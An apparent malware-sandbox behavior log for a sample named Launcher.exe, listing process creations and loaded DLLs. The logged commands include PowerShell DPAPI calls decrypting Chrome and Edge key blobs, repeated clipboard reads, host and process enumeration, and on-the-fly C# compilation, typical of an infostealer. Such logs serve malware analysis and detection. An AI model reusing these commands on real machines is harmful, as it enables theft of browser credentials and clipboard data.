        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,229,84,116,194,55,158,10,155,7,192,49,104,248,171,26,45,193,192,136,51,159,58,190,20,160,100,225,172,82,201,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,84,197,246,171,78,251,4,184,21,210,77,231,199,226,99,5,37,235,235,142,78,56,131,31,47,57,48,134,233,72,33,48,0,0,0,133,210,231,65,176,63,231,110,125,215,114,63,38,34,35,188,254,41,153,224,42,114,53,153,20,177,217,39,200,54,6,187,214,56,242,234,172,181,105,212,150,84,57,216,214,140,120,82,64,0,0,0,223,114,148,158,168,50,101,199,84,98,138,135,54,87,107,183,131,69,246,154,227,198,116,130,148,205,149,173,54,39,176,144,53,100,44,173,255,21,46,131,221,11,133,10,234,13,131,89,161,121,97,59,116,23,242,182,143,114,51,199,52,30,88,41), $null, 'CurrentUser')"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\HOSTNAME.EXE hostname
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\user\AppData\Roaming\temp.ps1 "
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3D45.tmp" "c:\Users\user\AppData\Local\Temp\anq2mtqn\CSCF5995D8BF694D46AD6A4558D7F1AF.TMP"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,77,127,197,5,168,152,200,155,69,152,248,126,243,173,208,170,177,11,23,236,4,169,187,112,241,90,67,2,84,166,57,221,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,145,70,140,215,187,63,14,237,133,51,108,6,54,190,49,3,104,104,254,170,42,244,243,157,99,154,78,3,72,94,164,48,0,0,0,166,79,77,120,154,92,2,100,62,122,156,178,149,130,253,55,138,66,130,243,72,252,212,17,151,208,209,36,74,236,133,103,0,200,20,58,119,255,106,79,88,97,171,172,50,51,135,138,64,0,0,0,214,73,72,146,208,244,214,102,85,11,142,231,240,104,125,181,134,177,29,222,22,142,226,145,204,128,227,183,233,28,145,105,42,124,121,226,218,198,67,214,130,64,131,113,170,34,15,172,229,198,163,153,131,134,138,65,60,93,25,230,160,219,252,77), $null, 'CurrentUser')Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,229,84,116,194,55,158,10,155,7,192,49,104,248,171,26,45,193,192,136,51,159,58,190,20,160,100,225,172,82,201,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,84,197,246,171,78,251,4,184,21,210,77,231,199,226,99,5,37,235,235,142,78,56,131,31,47,57,48,134,233,72,33,48,0,0,0,133,210,231,65,176,63,231,110,125,215,114,63,38,34,35,188,254,41,153,224,42,114,53,153,20,177,217,39,200,54,6,187,214,56,242,234,172,181,105,212,150,84,57,216,214,140,120,82,64,0,0,0,223,114,148,158,168,50,101,199,84,98,138,135,54,87,107,183,131,69,246,154,227,198,116,130,148,205,149,173,54,39,176,144,53,100,44,173,255,21,46,131,221,11,133,10,234,13,131,89,161,121,97,59,116,23,242,182,143,114,51,199,52,30,88,41), $null, 'CurrentUser')Jump to behavior
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: dbghelp.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: winmm.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: powrprof.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: umpdc.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: napinsp.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: pnrpnsp.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: wshbth.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: nlaapi.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: dnsapi.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: winrnr.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: ntmarta.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: dhcpcsvc6.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: dhcpcsvc.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: fwpuclnt.dll
        Source: C:\Users\user\Desktop\Launcher.exe Section loaded: dpapi.dll
        Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: mswsock.dll
        Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: napinsp.dll
        Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: pnrpnsp.dll
        Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: wshbth.dll
        Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: nlaapi.dll
        Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: dnsapi.dll
        Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: winrnr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
        Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
        Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
        Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
        Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
        Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
